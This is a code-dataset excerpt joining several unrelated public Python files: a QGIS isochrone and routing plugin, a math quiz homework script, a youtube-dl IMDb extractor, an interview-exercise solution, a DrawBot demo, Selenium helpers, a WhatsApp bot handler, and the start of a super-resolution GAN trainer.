\n self.project.addMapLayer(res_ly)\n\n\n def get_iso_v2(self):\n # Initialisation du compteur de réussite\n nb_ok = 0\n\n # Initialisation de la liste d'erreures\n lst_bug = []\n\n # Initialisation des paramètres de recherche\n resource = \"resource=bdtopo-pgr\"\n costType = self.methode\n profile = self.reseau\n\n # test de présence de bornes\n try:\n rq_bornes = self.get_bornes()\n except Exception:\n self.iso_ign_windows.consol.setText(traceback.format_exc())\n if not rq_bornes:\n return\n\n # test si au moins un point origine est selectioné et reprojection en WGS84\n ori_layer = self.iface.activeLayer()\n selected_pt = ori_layer.selectedFeatures()\n\n if selected_pt:\n crsOri = ori_layer.crs()\n crsDest = QgsCoordinateReferenceSystem(\"EPSG:4326\")\n xform = QgsCoordinateTransform(crsOri, crsDest, self.project)\n for pt in selected_pt:\n ptt = pt.geometry()\n if ptt.type() == QgsWkbTypes.PointGeometry:\n ptt.transform(xform)\n pt.setGeometry(ptt)\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Vous ne pouvez selectionner que des géométrie de type 'Point'\")\n return\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Aucun point selectioné!\")\n return\n\n # création du layer de résultats\n res_ly = QgsVectorLayer(\"Polygon\", \"Aire de chalandise\", \"memory\")\n res_provider = res_ly.dataProvider()\n res_provider.addAttributes(ori_layer.fields())\n res_provider.addAttributes([QgsField(\"iso_cost\", QVariant.Int)])\n res_provider.addAttributes([QgsField(\"iso_unit\", QVariant.String)])\n res_ly.updateFields()\n\n # création du layer d'erreures\n err_ly = QgsVectorLayer(\"Point\", \"Erreures Aire de chalandise\", \"memory\")\n err_provider = err_ly.dataProvider()\n err_provider.addAttributes(ori_layer.fields())\n err_provider.addAttributes([QgsField(\"iso_cost\", QVariant.Int)])\n err_provider.addAttributes([QgsField(\"error\", QVariant.String)])\n err_ly.updateFields()\n\n # Création de la liste de requêtes à effectuer\n lst_req = []\n for borne in rq_bornes:\n costValue = str(borne)\n for f in selected_pt:\n geom = f.geometry()\n gx = geom.asPoint().x()\n gy = geom.asPoint().y()\n coord = \"%f,%f\" % (gx, gy)\n feat_attribute = f.attributes()\n lst_req.append((coord, costValue, feat_attribute))\n\n # Effectue les recherche\n for r in lst_req:\n urlq = URL + \"isochrone?\" + resource + \"&\" + profile + \"&\" + costType + \"&costValue=\" + r[1] + \"&point=\" + r[0] + \"&geometryFormat=geojson\"\n\n res = self.ask_ign(urlq)\n if res == \"bug\":\n lst_bug.append((r[0], r[1], \"pas de réponse de l'API\", r[2]))\n elif \"error\" in res:\n lst_bug.append((r[0], r[1], res[\"error\"][\"message\"], r[2]))\n elif res[\"geometry\"][\"type\"] not in [\"Polygon\"]:\n lst_bug.append((r[0], r[1], \"La réponse n'est pas un polygone\", r[2]))\n else:\n res_feat = QgsFeature()\n\n for poly in res[\"geometry\"][\"coordinates\"]:\n val = \"\"\n for pt in poly:\n bi = \"%f %f, \" % (pt[0], pt[1])\n val += bi\n wkt = res[\"geometry\"][\"type\"] + \" \" + \"((\" + val + \"))\"\n res_feat_geom = QgsGeometry.fromWkt(wkt)\n res_feat.setGeometry(res_feat_geom)\n data = r[2]\n data.append(r[1])\n data.append(self.unit)\n res_feat.setAttributes(data)\n res_provider.addFeature(res_feat)\n nb_ok += 1\n\n\n # Test et affiche les résults\n if res_ly.featureCount() > 0:\n self.project.addMapLayer(res_ly)\n res_ly.updateExtents()\n self.iface.layerTreeView().refreshLayerSymbology(res_ly.id())\n self.iso_ign_windows.consol.setText(\"{} aires de chalandises trouvée(s) et {} ont échouée(s)\".format(nb_ok, len(lst_bug)))\n else:\n self.iso_ign_windows.consol.setText(\"Aucune aire de chalandise trouvée. Liste des erreures : \" + str(lst_bug))\n \n # Affichage de la couche des erreures\n if len(lst_bug) > 0:\n\n for e in lst_bug:\n e[0].replace(\"'\", '')\n x, y = e[0].split(\",\")\n x = float(x)\n y = float(y)\n err_pt = QgsFeature()\n err_data = e[3]\n err_data.append(e[1])\n err_data.append(e[2])\n err_pt.setAttributes(err_data) \n err_pt.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(x, y)))\n err_provider.addFeatures([err_pt])\n \n self.project.addMapLayer(err_ly)\n\n \n \n\n ########################################################################\n # Mode Itinéraires #\n ########################################################################\n \n def get_iti(self):\n # Initialisation du compteur de réussite\n nb_ok = 0\n\n\n # Initialisation de la liste d'erreures\n lst_bug = []\n\n # Initialisation des paramètres de recherche\n resource = \"resource=bdtopo-pgr\"\n costType = self.methode\n profile = self.reseau\n\n # Initialisation des couches et champs origine et destination\n iti_ly_ori = self.iso_ign_windows.orily_picker.currentLayer()\n iti_f_ori = self.iso_ign_windows.orifield_picker.currentField()\n iti_ly_dest = self.iso_ign_windows.destly_picker.currentLayer()\n iti_f_dest = self.iso_ign_windows.destfield_picker.currentField()\n\n # Initialisation de la couche de résultats\n res_ly = QgsVectorLayer(\"Linestring\", \"itinéraire\", \"memory\")\n res_provider = res_ly.dataProvider()\n\n # Ajout des champs identifiants à la couche des resultats\n res_provider.addAttributes([field for field in iti_ly_ori.fields() if field.name() in [iti_f_ori]])\n res_ly.updateFields()\n res_ly.startEditing()\n idx_to_change = res_ly.fields().names().index(iti_f_ori)\n res_ly.renameAttribute(idx_to_change, \"id_ori\")\n res_ly.commitChanges()\n\n res_provider.addAttributes([field for field in iti_ly_dest.fields() if field.name() in [iti_f_dest]])\n res_ly.updateFields()\n res_ly.startEditing()\n idx_to_change = res_ly.fields().names().index(iti_f_dest)\n res_ly.renameAttribute(idx_to_change, \"id_dest\")\n res_ly.commitChanges()\n\n res_provider.addAttributes([QgsField(\"profile\", QVariant.String)])\n res_provider.addAttributes([QgsField(\"metres\", QVariant.Int)])\n res_provider.addAttributes([QgsField(\"minutes\", QVariant.Int)])\n res_ly.updateFields()\n\n # création d'une liste les coord des origines et l'identifiant :\n selected_ori_pt = iti_ly_ori.selectedFeatures()\n lst_coord_start = []\n if selected_ori_pt:\n\n crsOri = iti_ly_ori.crs()\n crsDest = QgsCoordinateReferenceSystem(\"EPSG:4326\")\n xform = QgsCoordinateTransform(crsOri, crsDest, self.project)\n for pt in selected_ori_pt:\n\n id_origine = pt[iti_f_ori]\n ptt = pt.geometry()\n ptt.transform(xform)\n pt.setGeometry(ptt)\n\n geom = pt.geometry()\n gx = geom.asPoint().x()\n gy = geom.asPoint().y()\n coord_start = \"%f,%f\" % (gx, gy)\n tpl_coord_strat = (id_origine, coord_start)\n lst_coord_start.append(tpl_coord_strat)\n\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Aucune origine selectionée!\")\n return\n\n # création d'une liste les coord des destinations:\n selected_dest_pt = iti_ly_dest.selectedFeatures()\n lst_coord_end = []\n if selected_dest_pt:\n\n crsOri = iti_ly_dest.crs()\n crsDest = QgsCoordinateReferenceSystem(\"EPSG:4326\")\n xform = QgsCoordinateTransform(crsOri, crsDest, self.project)\n\n for pt in selected_dest_pt:\n id_destination = pt[iti_f_dest]\n ptt = pt.geometry()\n ptt.transform(xform)\n pt.setGeometry(ptt)\n\n geom = pt.geometry()\n gx = geom.asPoint().x()\n gy = geom.asPoint().y()\n coord_end = \"%f,%f\" % (gx, gy)\n tpl_coord_end = (id_destination, coord_end)\n lst_coord_end.append(tpl_coord_end)\n\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Aucune destination selectionée!\")\n return\n\n # Test la méthode de calcul et création de la liste de requêtes\n methode_iti = self.iso_ign_windows.calciti_picker.currentIndex()\n\n\n # Mode Tous vers Tous\n ###############################################################\n\n if methode_iti == 0:\n # Méthode Tous vers Tous\n lst_od = []\n for o in lst_coord_start:\n for d in lst_coord_end:\n idx_ori = \"{}\".format(o[0])\n idx_dest = \"{}\".format(d[0])\n req_od = \"&start={}&end={}\".format(o[1], d[1])\n req_tpl = (idx_ori, idx_dest, req_od)\n lst_od.append(req_tpl)\n #print(lst_od)\n\n\n # Mode Un vers Un\n ###############################################################\n\n elif methode_iti == 1:\n # Méthode Un à Un\n # Test si le nombre de points est égale entre les origine et les destination\n if len(lst_coord_start) == len(lst_coord_end):\n tmp_lst_ori = []\n for o in lst_coord_start:\n idx_ori = \"{}\".format(o[0])\n coord_ori = \"&start={}\".format(o[1])\n tmp_lst_ori.append((idx_ori, coord_ori))\n\n tmp_lst_dest = []\n for d in lst_coord_end:\n idx_dest = \"{}\".format(d[0])\n coord_dest = \"&end={}\".format(d[1])\n tmp_lst_dest.append((idx_dest, coord_dest))\n\n lst_od = [(tmp_lst_ori[i][0], tmp_lst_dest[i][0], tmp_lst_ori[i][1] + tmp_lst_dest[i][1]) for i in range(0, len(tmp_lst_ori))]\n\n # tmplst = list(map(lambda x, y: (x, y), lst_coord_start, lst_coord_end))\n\n else:\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Le nombre de points de départ et d'arrivée doit être identique.\")\n return\n\n\n # Mode Le plus proche\n ###############################################################\n\n else:\n # Méthode Le plus proche\n # TODO\n QMessageBox.warning(self.iso_ign_windows, \"Oops !\", \"Comming soon !\")\n return\n\n # Effectue les requêtes\n for od in lst_od:\n urlq = URL + \"route?\" + resource + \"&\" + profile + \"&\" + costType + od[2] + \"&geometryFormat=geojson\"\n res = self.ask_ign(urlq)\n if res == \"bug\":\n lst_bug.append(\"({}, {}, {})\".format(od[0], od[1], \"pas de réponse de l'API\"))\n elif \"error\" in res:\n lst_bug.append(\"({}, {}, {})\".format(od[0], od[1], res[\"error\"][\"message\"]))\n elif res[\"geometry\"][\"type\"] not in [\"LineString\"]:\n lst_bug.append(\"({}, {}, {})\".format(od[0], od[1], \"Le réponse n'est pas une polyigne\"))\n else:\n\n val = \"\"\n for pt in res[\"geometry\"][\"coordinates\"]:\n bi = \"%f %f, \" % (pt[0], pt[1])\n val += bi\n wkt = res[\"geometry\"][\"type\"] + \" \" + \"((\" + val + \"))\"\n\n # Ajout des resultats dans le layer de resultats\n res_feat = QgsFeature()\n res_feat.setAttributes([od[0], od[1], res[\"profile\"], res[\"distance\"], res[\"duration\"]])\n res_feat_geom = QgsGeometry.fromWkt(wkt)\n res_feat.setGeometry(res_feat_geom)\n res_provider.addFeature(res_feat)\n nb_ok += 1\n\n if res_ly.featureCount() > 0:\n self.project.addMapLayer(res_ly)\n res_ly.updateExtents()\n self.iface.layerTreeView().refreshLayerSymbology(res_ly.id())\n self.iso_ign_windows.consol.setText(\"{} itinéraires trouvé(s) et {} ont échoué(s)\".format(nb_ok, len(lst_bug)))\n else:\n self.iso_ign_windows.consol.setText(\"Aucun itinéraire trouvé. Liste des erreures : \" + str(lst_bug))\n\n ########################################################################\n # Perform alg #\n ########################################################################\n\n def perform_rq_v2(self):\n # Test des services IGN (désactivé pour le dev)\n # testIgnSrv = str(rss_ign.ressourceIgn.resultats(rss_ign.ressourceIgn))\n testIgnSrv = \"Tous les services de l'IGN fonctionnent\"\n if testIgnSrv == \"Tous les services de l'IGN fonctionnent\":\n\t # charge les paramètres de l'utilisateur\n try:\n self.get_param()\n except Exception:\n self.iso_ign_windows.consol.setText(traceback.format_exc())\n # test de la fonction demandée\n if self.iso_ign_windows.tabWidget.currentWidget().objectName() == \"tab_iso\":\n # recherche d'isochrones\n if self.iso_ign_windows.cb_choix_api.currentText() == \"IGN v2\":\n #print(\"recherche d'aires de chalandises\")\n self.get_iso_v2()\n else:\n self.get_iso_v1()\n \n elif self.iso_ign_windows.tabWidget.currentWidget().objectName() == \"tab_iti\":\n # recherche d'itinéraires\n #print(\"Recherche d'itinéraires\")\n self.get_iti()\n else:\n print(\"Pas de widget de recherche\")\n return\n else:\n self.iso_ign_windows.consol.setText(testIgnSrv)\n return\n\n def run(self):\n \"\"\"Affiche la gui et paramétrages par défaut\"\"\"\n\n self.iso_ign_windows = IsoIGNDialog()\n self.iso_ign_windows.radioButton_pieton.setChecked(True)\n self.iso_ign_windows.radioButton_distance.setChecked(True)\n #testIgnSrv = \"Etats des serveurs de l'IGN : \\n\"+str(rss_ign.ressourceIgn.resultats(rss_ign.ressourceIgn))\n welkom_msg = \"Bienvenue dans IsoIGN v\" + version + \".\\nQue voulez vous faire ?\"\n self.iso_ign_windows.consol.setText(welkom_msg)\n self.iso_ign_windows.bt_ok.clicked.connect(self.perform_rq_v2)\n self.iso_ign_windows.lbl_appver.setText(\"IsoIGN - version \" + version)\n self.iso_ign_windows.show()\n ","repo_name":"cartoinddigo/iso_ign","sub_path":"iso_ign.py","file_name":"iso_ign.py","file_ext":"py","file_size_in_byte":28654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30529747213","text":"'''Написати програму quiz.py, яка показує користувачу випадкове завдання \nта очікує від нього відповідь. \nЯкщо відповідь правильна - привітат��, та запропонувати наступне завдання. \nЯкщо відповідь не правильна - запропонувати розв'язати те ж завдання ще раз. \nЩоб вийти з програми - варто написати q.\n'''\n\nprint('''Вітаю!\nЯ допоможу тобі навчитись розв\\'язувати математичні завдання! \nНапиши \\'q\\', щоб вийти або 'n' - щоб перейти до наступного завдання.\n''')\n\nfrom random import randint\n\nvOperationsTuple = ('+', '-', '*', '/')\n\nv1stOperand = randint(1, 100)\nv2ndOperand = randint(1, 100)\nvOperation = randint(0, 3)\nvAnswer = 0\nvNewTask = False\n\nwhile True:\n if vNewTask:\n v1stOperand = randint(1, 100)\n v2ndOperand = randint(1, 100)\n vOperation = randint(0, 3)\n vAnswer = 0 \n\n if vOperation == 0:\n vAnswer = v1stOperand + v2ndOperand\n elif vOperation == 1:\n vAnswer = v1stOperand - v2ndOperand\n elif vOperation == 2:\n vAnswer = v1stOperand * v2ndOperand\n elif vOperation == 3:\n vAnswer = v1stOperand / v2ndOperand\n\n vUserResult = input('Result {} {} {} = '.format(v1stOperand, vOperationsTuple[vOperation], v2ndOperand))\n\n if vUserResult == 'q':\n print('\\nThat\\'s all Folks!')\n break\n elif vUserResult == 'n':\n vNewTask = True\n\n print('\\nSo sad, but as you wish!\\n')\n continue\n else:\n vNewTask = False\n vResult_Error = False\n vResult_Neg = False\n\n vResult = vUserResult.strip()\n\n if vResult.find(',') > 0:\n vResult = vResult.replace(',', '.') \n\n if vResult.find('-') == 0:\n vResult = vResult.replace('-', '')\n vResult_Neg = True\n \n vResult_List = vResult.split('.')\n \n if len(vResult_List) == 1:\n if vResult.isnumeric():\n vResult = int(vResult_List[0])\n else:\n vResult_Error = True\n else:\n if len(vResult_List) == 2:\n vResult_Left = vResult_List[0]\n vResult_Right = vResult_List[1]\n\n if vResult_Left.isnumeric() and vResult_Right.isnumeric():\n vResult_Left = int(vResult_Left)\n vResult_Right = int(vResult_Right)\n\n vResult = vResult_Left + vResult_Right / (10 ** len(str(vResult_Right)))\n else:\n vResult_Error = True\n else:\n vResult_Error = True\n\n if not vResult_Error: \n if vResult_Neg:\n vResult = -1 * vResult\n\n if vResult == vAnswer:\n print('Correctly!\\n')\n\n vNewTask = True\n else:\n print('Unfortunately! Let\\'s try again!\\n') \n else:\n print('Wrong format! Let\\'s try again!\\n') \n","repo_name":"ZSerhii/Beetroot.Academy","sub_path":"Homeworks/quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24825505433","text":"from __future__ import unicode_literals\n\nimport re\n\nfrom .common import InfoExtractor\nfrom ..utils import (\n determine_ext,\n mimetype2ext,\n parse_duration,\n qualities,\n url_or_none,\n)\n\n\nclass ImdbIE(InfoExtractor):\n IE_NAME = 'imdb'\n IE_DESC = 'Internet Movie Database trailers'\n _VALID_URL = r'https?://(?:www|m)\\.imdb\\.com/(?:video|title|list).+?[/-]vi(?P\\d+)'\n\n _TESTS = [{\n 'url': 'http://www.imdb.com/video/imdb/vi2524815897',\n 'info_dict': {\n 'id': '2524815897',\n 'ext': 'mp4',\n 'title': 'No. 2 from Ice Age: Continental Drift (2012)',\n 'description': 'md5:87bd0bdc61e351f21f20d2d7441cb4e7',\n }\n }, {\n 'url': 'http://www.imdb.com/video/_/vi2524815897',\n 'only_matching': True,\n }, {\n 'url': 'http://www.imdb.com/title/tt1667889/?ref_=ext_shr_eml_vi#lb-vi2524815897',\n 'only_matching': True,\n }, {\n 'url': 'http://www.imdb.com/title/tt1667889/#lb-vi2524815897',\n 'only_matching': True,\n }, {\n 'url': 'http://www.imdb.com/videoplayer/vi1562949145',\n 'only_matching': True,\n }, {\n 'url': 'http://www.imdb.com/title/tt4218696/videoplayer/vi2608641561',\n 'only_matching': True,\n }, {\n 'url': 'https://www.imdb.com/list/ls009921623/videoplayer/vi260482329',\n 'only_matching': True,\n }]\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n webpage = self._download_webpage(\n 'https://www.imdb.com/videoplayer/vi' + video_id, video_id)\n video_metadata = self._parse_json(self._search_regex(\n r'window\\.IMDbReactInitialState\\.push\\(({.+?})\\);', webpage,\n 'video metadata'), video_id)['videos']['videoMetadata']['vi' + video_id]\n title = self._html_search_meta(\n ['og:title', 'twitter:title'], webpage) or self._html_search_regex(\n r'(.+?)', webpage, 'title', fatal=False) or video_metadata['title']\n\n quality = qualities(('SD', '480p', '720p', '1080p'))\n formats = []\n for encoding in video_metadata.get('encodings', []):\n if not encoding or not isinstance(encoding, dict):\n continue\n video_url = url_or_none(encoding.get('videoUrl'))\n if not video_url:\n continue\n ext = mimetype2ext(encoding.get(\n 'mimeType')) or determine_ext(video_url)\n if ext == 'm3u8':\n formats.extend(self._extract_m3u8_formats(\n video_url, video_id, 'mp4', entry_protocol='m3u8_native',\n m3u8_id='hls', fatal=False))\n continue\n format_id = encoding.get('definition')\n formats.append({\n 'format_id': format_id,\n 'url': video_url,\n 'ext': ext,\n 'quality': quality(format_id),\n })\n self._sort_formats(formats)\n\n return {\n 'id': video_id,\n 'title': title,\n 'formats': formats,\n 'description': video_metadata.get('description'),\n 'thumbnail': video_metadata.get('slate', {}).get('url'),\n 'duration': parse_duration(video_metadata.get('duration')),\n }\n\n\nclass ImdbListIE(InfoExtractor):\n IE_NAME = 'imdb:list'\n IE_DESC = 'Internet Movie Database lists'\n _VALID_URL = r'https?://(?:www\\.)?imdb\\.com/list/ls(?P\\d{9})(?!/videoplayer/vi\\d+)'\n _TEST = {\n 'url': 'https://www.imdb.com/list/ls009921623/',\n 'info_dict': {\n 'id': '009921623',\n 'title': 'The Bourne Legacy',\n 'description': 'A list of trailers, clips, and more from The Bourne Legacy, starring Jeremy Renner and Rachel Weisz.',\n },\n 'playlist_count': 8,\n }\n\n def _real_extract(self, url):\n list_id = self._match_id(url)\n webpage = self._download_webpage(url, list_id)\n entries = [\n self.url_result('http://www.imdb.com' + m, 'Imdb')\n for m in re.findall(r'href=\"(/list/ls%s/videoplayer/vi[^\"]+)\"' % list_id, webpage)]\n\n list_title = self._html_search_regex(\n r']+class=\"[^\"]*header[^\"]*\"[^>]*>(.*?)

',\n webpage, 'list title')\n list_description = self._html_search_regex(\n r']+class=\"[^\"]*list-description[^\"]*\"[^>]*>

(.*?)

',\n webpage, 'list description')\n\n return self.playlist_result(entries, list_id, list_title, list_description)\n","repo_name":"tvalacarta/tvalacarta","sub_path":"python/main-classic/lib/youtube_dl/extractor/imdb.py","file_name":"imdb.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"47"} +{"seq_id":"1605374403","text":"\"\"\"\n17.7 Baby Names: Each year, the government releases a list of the 10000 most common baby names\nand their frequencies (the number of babies with that name). The only problem with this is that\nsome names have multiple spellings. For example, \"John\" and ''.Jon\" are essentially the same name\nbut would be listed separately in the list. Given two lists, one of names/frequencies and the other\nof pairs of equivalent names, write an algorithm to print a new list of the true frequency of each\nname. Note that if John and Jon are synonyms, and Jon and Johnny are synonyms, then John and\nJohnny are synonyms. (It is both transitive and symmetric.) In the final list, any name can be used\nas the \"real\" name.\nEXAMPLE\nInput:\nNames: John (15), Jon (12), Chris (13), Kris (4), Christopher (19)\nSynonyms: (Jon, John), (John, Johnny), (Chris, Kris), (Chris, Christopher)\nOutput: John (27), Kris (36)\nHints:#478, #493, #512, #537, #586, #605, #655, #675, #704\n\"\"\"\n\n\ndef real_name_freq(freq, syn):\n\tsyn_hash = {}\n\tfor s in syn:\n\t\t#print(s)\n\t\t#print(syn_hash)\n\t\tif s[0] not in syn_hash:\n\t\t\tsyn_hash[s[0]] = [s[1]]\n\t\telse:\n\t\t\tsyn_hash[s[0]].append(s[1])\n\n\t\tif s[1] not in syn_hash:\n\t\t\tsyn_hash[s[1]] = [s[0]]\n\t\telse:\n\t\t\tsyn_hash[s[1]].append(s[0])\n\tprint(syn_hash)\n\tsyn_hash_freq = {}\n\tfor key,value in syn_hash.items():\n\t\tnames = value\n\t\tif names != None:\n\t\t\tfor name in names:\n\t\t\t\tif syn_hash[name]:\n\t\t\t\t\tnames = names + syn_hash[name]\n\t\t\tfor name in names:\n\t\t\t\tsyn_hash[name] = None\n\t\tsyn_hash_freq[str(names)] = 0\n\n\t\tfor key,value in freq.items():\n\t\t\tif names == None:\n\t\t\t\tcontinue\n\t\t\tif key in names:\n\t\t\t\tsyn_hash_freq[str(names)] += value\n\n\treturn syn_hash_freq\n\nnames = {\"John\":15, \"jon\":12,\"Chris\":13, \"Kris\":4, \"Christopher\":19}\nsynonyms = [(\"Jon\", \"John\"), (\"John\", \"Johnny\"), (\"Chris\", \"Kris\"), (\"Chris\", \"Christopher\")]\nprint(real_name_freq(names, synonyms))\n","repo_name":"rshannon3/CTCI","sub_path":"chapter_17/17-7.py","file_name":"17-7.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12361925829","text":"# in this demo, we will draw shapes into an image, and render that image within a clipping path\n\n# define an empty bezier path\nbp = BezierPath()\n\n# define a formatted string\nfs = FormattedString('A', font='Times', fontSize=1500)\n\n# draw our formatted string into the bezier path\n# this is like “create outlines” in illustrator\n# converting text into shapes\nbp.text(fs)\n\n# make an empty image object\nim = ImageObject()\n\n# draw our texture into the image\nwith im:\n # move to center\n translate(width()/2, height()/2)\n # make a lot of dots\n for i in range(10000):\n with savedState():\n # random color\n fill(random(), random(), random())\n # random position\n offsetX = randint(-width()/2, width()/2)\n offsetY = randint(-height()/2, height()/2)\n # random diameter\n d = randint(5, 30)\n # move and draw\n translate(offsetX, offsetY)\n oval(-d/2, -d/2, d, d)\n\n# now we are back in the main canvas\n# pass our already-defined BezierPath to the clipPath() function\n# anything after this will be drawn inside our bp\nclipPath(bp)\n\n# apply our image filters\nim.vortexDistortion((width()/2, height()/2), 500)\nim.sepiaTone()\n# draw an image\nimage(im, (0, 0))\n","repo_name":"djrrb/Python-For-Visual-Designers-S2021","sub_path":"session-5/stipple3.py","file_name":"stipple3.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"5117618553","text":"import logging\nimport os.path\nimport allure\nfrom selenium.webdriver import ActionChains\nfrom typing import AnyStr, List\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.alert import Alert\n\nlogger = logging.getLogger(__name__)\n\n\nclass BasePage:\n\n def __init__(self, driver):\n self.driver = driver\n\n def save_screenshot(self):\n index = 0\n os.makedirs(\"screenshots\", exist_ok=True)\n while os.path.exists(f\"screenshots/{index}.png\"):\n index += 1\n self.driver.get_screenshot_as_file(f\"screenshots/{index}.png\")\n\n @allure.step('Input text to {element}')\n def _input(self, element, value) -> None:\n self.click(element)\n element.clear()\n element.send_keys(value)\n\n @allure.step('Waiting element {locator}')\n def element(self, locator: tuple) -> WebElement:\n try:\n return WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located(locator))\n except TimeoutException as e:\n logger.exception(e)\n allure.attach(\n name=\"Screenshot\",\n body=self.driver.get_screenshot_as_png(),\n attachment_type=allure.attachment_type.PNG\n )\n self.save_screenshot()\n raise AssertionError(f'Не дождался видимости элемента {locator}')\n\n @allure.step('Waiting not visible element {locator}')\n def not_visible_element(self, locator: tuple) -> bool:\n try:\n return WebDriverWait(self.driver, 2).until(EC.invisibility_of_element_located(locator))\n except TimeoutException as e:\n logger.exception(e)\n allure.attach(\n name=\"Screenshot\",\n body=self.driver.get_screenshot_as_png(),\n attachment_type=allure.attachment_type.PNG\n )\n self.save_screenshot()\n raise AssertionError(f'Элемент до сих пор виден {locator}')\n\n @allure.step('Click button')\n def click(self, element) -> None:\n ActionChains(self.driver).move_to_element(element).pause(0.1).click().perform()\n\n @allure.step('Waiting elements {locator}')\n def elements(self, locator: tuple) -> List[WebElement]:\n try:\n return WebDriverWait(self.driver, 5).until(EC.visibility_of_all_elements_located(locator))\n except TimeoutException as e:\n logger.exception(e)\n allure.attach(\n name=\"Screenshot\",\n body=self.driver.get_screenshot_as_png(),\n attachment_type=allure.attachment_type.PNG\n )\n self.save_screenshot()\n raise AssertionError(f'Не дождался видимости элементов {locator}')\n\n @allure.step('Get text of element {locator}')\n def get_text_of_element(self, locator: tuple) -> AnyStr:\n return self.element(locator).text\n\n @allure.step('Check title with {title}')\n def check_title_page(self, title: str) -> bool:\n return self.driver.title in title\n\n @allure.step('Accept alert')\n def alert_accept(self) -> None:\n try:\n Alert(self.driver).accept()\n except:\n return\n","repo_name":"osteron/qa-sdet-final-project","sub_path":"page_objects/BasePage.py","file_name":"BasePage.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"4188064925","text":"import random\r\nfrom time import sleep\r\n\r\n\r\ndef send(driver, message):\r\n driver.find_element_by_xpath(\r\n '//*[@id=\"main\"]/footer/div[1]/div/span[2]/div/div[2]/div[1]/div/div[2]'\r\n ).send_keys(f\"{str(message)}\")\r\n sleep(1)\r\n driver.find_element_by_xpath(\r\n '//*[@id=\"main\"]/footer/div[1]/div/span[2]/div/div[2]/div[2]/button').click()\r\n sleep(1.5)\r\n\r\n\r\ndef messageHandler(driver, message):\r\n if message.lower().strip() in ['hi', 'hey', 'hello']:\r\n resp = ['Hey there, How are you??', 'Hi', 'What\\'s up??']\r\n send(driver, random.choice(resp))\r\n","repo_name":"jackma33/CODES","sub_path":"DROPPED!!/whatsapp-bot/whatsapp/utils/messageHandler.py","file_name":"messageHandler.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16130102035","text":"import torch\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\nimport numpy as np\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nimport argparse\r\nimport torch.optim as optim\r\nimport os\r\nfrom glob import glob\r\nfrom PIL import Image\r\n\r\nfrom models import *\r\n\r\n\r\nclass ResolutionDataset(torch.utils.data.Dataset):\r\n def __init__(self, low_res_dir, high_res_dir, low_res_length, high_res_length):\r\n self.low_res_dir = low_res_dir\r\n self.high_res_dir = high_res_dir\r\n\r\n # low resolution transformation\r\n self.low_res_transform = transforms.Compose([\r\n transforms.Resize((low_res_length, low_res_length),\r\n interpolation=Image.BICUBIC),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=0.5, std=0.5)\r\n ])\r\n\r\n # high resolution transformation\r\n self.high_res_transform = transforms.Compose([\r\n transforms.Resize((high_res_length, high_res_length),\r\n interpolation=Image.BICUBIC),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=0.5, std=0.5)\r\n ])\r\n\r\n # search for png files in respective directories\r\n self.low_res_list = list(\r\n map(Image.open, glob(self.low_res_dir + '*.png')))\r\n self.high_res_list = list(\r\n map(Image.open, glob(self.high_res_dir + '*.png')))\r\n\r\n def __len__(self):\r\n return len(self.low_res_list)\r\n\r\n def __getitem__(self, idx):\r\n if torch.is_tensor(idx):\r\n idx = idx.tolist()\r\n\r\n high_res_image = self.high_res_list[idx]\r\n low_res_image = self.low_res_list[idx]\r\n\r\n high_res_image = self.high_res_transform(high_res_image)\r\n low_res_image = self.low_res_transform(low_res_image)\r\n\r\n return low_res_image, high_res_image\r\n\r\n\r\nclass Trainer():\r\n\r\n def __init__(self, lr_dir_train, hr_dir_train, lr_dir_test, hr_dir_test, lr_length, hr_length, batch_size, lambda_adv=5e-3, lambda_pixel=1e-2, b1=0.9, b2=0.999, channels=3, feature_space=64, device='cpu', lr=0.0002, num_workers=1):\r\n\r\n self.train_dataset = ResolutionDataset(lr_dir_train, hr_dir_train, lr_length, hr_length)\r\n self.test_dataset = ResolutionDataset(lr_dir_test, hr_dir_test, lr_length, hr_length)\r\n\r\n self.train_loader = torch.utils.data.DataLoader(self.train_dataset, batch_size=batch_size, shuffle=True, num_workers=num_workers)\r\n self.test_loader = torch.utils.data.DataLoader(self.test_dataset, batch_size=batch_size, shuffle=True, num_workers=num_workers)\r\n\r\n self.batch_size = batch_size\r\n self.device = device\r\n self.lambda_adv = lambda_adv\r\n self.lambda_pixel = lambda_pixel\r\n\r\n self.gen = Generator(channels, feature_space).to(self.device)\r\n self.dis = Discriminator(hr_length, channels, feature_space).to(self.device)\r\n self.ext = FeatureExtractor().to(self.device)\r\n\r\n self.loss_func_logits = nn.BCEWithLogitsLoss().to(self.device)\r\n self.content_loss_func = nn.L1Loss().to(self.device)\r\n self.pixel_loss_func = nn.L1Loss().to(self.device)\r\n\r\n self.optimizer_g = optim.Adam(self.gen.parameters(), lr=lr, betas=(b1, b2))\r\n 